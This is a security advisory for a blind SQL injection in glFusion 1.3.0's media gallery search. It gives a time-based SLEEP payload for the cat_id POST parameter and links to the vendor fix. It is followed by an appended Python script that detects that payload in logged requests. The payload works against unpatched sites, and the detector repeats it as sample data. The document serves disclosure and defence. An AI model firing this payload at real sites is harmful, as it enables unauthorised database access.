Information
--------------------
Name : SQL Injection Vulnerability in glFusion
Software : glFusion 1.3.0 and possibly below.
Homepage : http://www.glfusion.org
Vulnerability Type : Blind SQL Injection
Researcher : Omar Kurt

Overview
--------------------
A dynamic system based on flexible and granular permissions, with spam protection, forums, file management, media gallery, calendars, polls, site-wide search, RSS feeds, and more!

Technical Summary
--------------------
glFusion is affected by a SQL Injection vulnerability in version 1.3.0.
Example PoC URL is as follows:

Blind SQL Injection Vulnerability
http://example.com/mediagallery/search.php
POST - param: cat_id='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

You can read the full article about SQL Injection vulnerabilities here: http://www.mavitunasecurity.com/sql-injection/

Solution
--------------------
http://www.glfusion.org/article.php/glfusion131

Netsparker Advisories, <advisories@mavitunasecurity.com>
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/
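For triage on sites still running 1.3.0, the following added example (not part of the advisory or of glFusion's code) scans logged POST requests to the search page and separates payloads that merely arrived from those whose requested delay shows up in the response time. The record layout, the `keywords` field and the rule that legitimate `cat_id` values are non-negative integers are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs

TARGET = "/mediagallery/search.php"
# SLEEP(n) as in the advisory's PoC; the captured group is the requested delay.
DELAY = re.compile(r"\b(?:pg_)?sleep\s*\(\s*(\d+(?:\.\d+)?)", re.I)
POC = "cat_id=%27%2B%28SELECT+1+FROM+%28SELECT+SLEEP%2825%29%29A%29%2B%27"

# Constructed records, not real traffic: (method, path, form body, seconds).
SAMPLE = [
    ("POST", TARGET, "cat_id=3&keywords=lake", 0.21),
    ("POST", TARGET, POC, 25.4),   # delay honoured
    ("POST", TARGET, POC, 0.19),   # same payload, no delay
    ("POST", TARGET, "cat_id=12&keywords=sleep+study", 9.7),  # slow but well-formed
    ("GET", "/index.php", "", 0.05),
]

def triage(method, path, body, seconds):
    """Return None, 'probe' (payload seen) or 'executed' (delay observed)."""
    if method != "POST" or not path.endswith(TARGET):
        return None
    verdict = None
    for value in parse_qs(body).get("cat_id", []):
        if value.isdigit():
            continue  # assumption: valid category IDs are non-negative integers
        verdict = verdict or "probe"
        m = DELAY.search(value)
        # A response at least as slow as the requested delay means the
        # injected expression reached the database and ran.
        if m and seconds >= float(m.group(1)):
            verdict = "executed"
    return verdict

def scan(records):
    """Return (index, verdict) for every record that is flagged."""
    return [(i, v) for i, r in enumerate(records) if (v := triage(*r))]

if __name__ == "__main__":
    for idx, verdict in scan(SAMPLE):
        print(idx, verdict, SAMPLE[idx][2])
```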